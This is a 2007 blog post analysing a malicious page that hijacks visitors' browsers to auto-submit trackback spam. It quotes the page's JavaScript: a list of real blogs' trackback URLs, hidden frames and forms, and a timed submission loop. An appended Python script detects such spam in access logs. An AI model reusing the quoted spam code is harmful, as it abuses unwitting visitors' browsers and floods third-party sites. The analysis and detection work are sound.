Spreading Comment and Trackback Spam Through Zombie Browsers
August 7, 2007 – 11:57 am

Since my move to WordPress, I have been noticing a lot of funny trackback hits going back to my old Movable Type installation. First of all, all of these hits were coming from different IP addresses and different browsers. Second, they all had the same referrer. Something was fishy. On further examination, I found something really interesting.
It seems that the referrer is hosting a malicious HTML page. That page consists of a set of JavaScripts which load new frames and submit trackback pings to other blogs on the Internet. That means that anyone visiting that malicious page is automatically submitting trackback spam somewhere else on the Net. When blog owners see the spam, they go back to check out the referrer and end up on the malicious page, which then submits more trackback spam in the background. The trackbacks themselves lead to fake blogs and search results, which eventually lead either to drug stores or to ad-populated pages.
There are several interesting things here. First, the malicious page kind of propagates itself. Second, the page does not use any kind of security exploit; everything is done through regular JavaScript. Third, there is apparently enough interest in referrers that it generates enough traffic to affect other sites. All of this is very similar to the way regular spam and viruses are spread, through zombie computers, except that in this case the browsers are the zombies.
Below are some snippets from the code of this site (you can view the decoded site source here, courtesy of Stephane “Gooby” Theroux’s decoder):
First, the site loads an array with the target trackback URLs:
var ss = new Array('http://140.99.61.57/cgi-bin/mt/mt-tb.cgi/211', 'http://64.130.58.178/cgi-sys/cgiwrap/ebradio/managed-mt/mt-tb.cgi/55', 'http://www.creativedestruction.com/MT/mt-tb.cgi/25', 'http://www.thirstytheologian.com/mt/mt-tb.cgi/287', 'http://www.ultrasparky.org/mt/mt-tb.cgi/5406', 'http://blog.avramovic.info/bblog/trackback.php/9/', 'http://www.technologyevangelist.com/cgi-bin/mt-tb.fcgi/685', 'http://www.edspresso.com/cgi-bin/mt/mt-t.cgi/1002', 'http://hellyes.nl/iam/wp-trackback.php?p=3', 'http://varnam.org/mt33/mt-tb.cgi/157', 'http://varnam.org/mt33/mt-tb.cgi/157');
The next step is to create the frames and the forms inside them:
var d = parent.fr1.document;
d.write('<div id=mainpage style="display:none">');
d.write('<div id=tbdescr align=center></div>');
d.write('<form name=fff method=POST target=fr2>');
d.write('<input type=text name=url>');
d.write('<input type=text name=title>');
d.write('<input type=text name=excerpt>');
d.write('<input type=text name=blogname>');
d.write('</form>');
d.write('</div>');
tbsp();
The third step is to load up the forms and submit them:
function tbsp()
{
var d = parent.fr1.document;
d.getElementById('tbdescr').innerHTML = ii + ': ' + unescape(ss[ii]);
d.fff.action = unescape(ss[ii]);
d.fff.url.value = unescape('http://getdayfile.nicespace.ca');
d.fff.title.value = unescape('Diphtheria');
d.fff.excerpt.value = 'Read more about ' + unescape('Diphtheria');
d.fff.blogname.value = unescape('Diphtheria');
d.fff.submit();
...
The fourth step is to rinse and repeat:
if (ii > 0) {
ii--;
setTimeout('tbsp()', 10000);
} else {
setTimeout('refresh()', 2000);
}
This is allowed to happen because the browser does not restrict a page's interaction with its own child frames: dynamically created frames containing forms can be submitted by script without any user interaction. It is not out of the realm of possibility for this type of attack to be extended to any sort of Web service or web application that accepts GET or POST requests. In fact it would probably be trivial, although most social networks and web applications should filter out JavaScript.
At the current time there is no protection against this type of attack other than disabling JavaScript or having the browser warn you before submitting a form.
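The pattern the post opens with, many distinct client IPs and browsers all posting trackback pings that carry one shared referrer, is also what a blog owner can pick out of the web server's access log. The following is an added example and not code from the original post: a small Python scan over constructed combined-log-format lines (the hostnames spam.example and friend.example are placeholders) that flags referrers whose trackback POSTs arrive from several distinct IPs and User-Agents.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (combined log format). Trackback pings are POSTs to
# mt-tb.cgi; the spam pattern is many distinct client IPs and browsers all carrying the
# same Referer, which is the page running the zombie-browser script.
SAMPLE_LOG = """\
203.0.113.10 - - [07/Aug/2007:11:50:01 -0400] "POST /mt/mt-tb.cgi/287 HTTP/1.1" 200 142 "http://spam.example/page.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/2.0.0.6"
198.51.100.23 - - [07/Aug/2007:11:50:14 -0400] "POST /mt/mt-tb.cgi/287 HTTP/1.1" 200 142 "http://spam.example/page.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
192.0.2.77 - - [07/Aug/2007:11:51:02 -0400] "POST /mt/mt-tb.cgi/287 HTTP/1.1" 200 142 "http://spam.example/page.html" "Opera/9.22 (X11; Linux i686; U; en)"
203.0.113.44 - - [07/Aug/2007:11:52:30 -0400] "POST /mt/mt-tb.cgi/287 HTTP/1.1" 200 142 "http://spam.example/page.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US) Safari/419.3"
198.51.100.5 - - [07/Aug/2007:11:55:10 -0400] "POST /mt/mt-tb.cgi/287 HTTP/1.1" 200 142 "http://friend.example/post/42" "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/2.0.0.6"
203.0.113.10 - - [07/Aug/2007:11:56:00 -0400] "GET /mt/2007/08/entry.html HTTP/1.1" 200 9001 "http://spam.example/page.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/2.0.0.6"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Trackback endpoints of the kinds seen in the target list: MT's mt-tb.cgi/.fcgi, WP/bBlog trackback.php
TRACKBACK_PATH = re.compile(r'/(mt-tb\.f?cgi|wp-trackback\.php|trackback\.php)(/|\?|$)')

def parse_log(text):
    """Yield one dict per line that matches the log format; malformed lines are skipped."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()

def suspicious_referrers(text, min_ips=3, min_agents=2):
    """Group trackback POSTs by Referer and flag referrers whose pings arrive from at least
    min_ips distinct client IPs and min_agents distinct User-Agents. A real blogger pings
    from one machine; a page driving other people's browsers shows up from many."""
    ips, agents = defaultdict(set), defaultdict(set)
    for rec in parse_log(text):
        if rec["method"] != "POST" or not TRACKBACK_PATH.search(rec["path"]):
            continue
        ref = rec["referer"]
        if not ref or ref == "-":
            continue  # no referrer to pivot on
        ips[ref].add(rec["ip"])
        agents[ref].add(rec["ua"])
    return {
        ref: {"ips": len(ips[ref]), "agents": len(agents[ref])}
        for ref in ips
        if len(ips[ref]) >= min_ips and len(agents[ref]) >= min_agents
    }
```

On the sample, only the spam.example referrer is flagged (four IPs, four browsers); the single ping from friend.example stays below the thresholds, and the GET with the same referrer is ignored because it is not a trackback POST.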
Comments are welcome at blog /at/ shaftek [dot] org.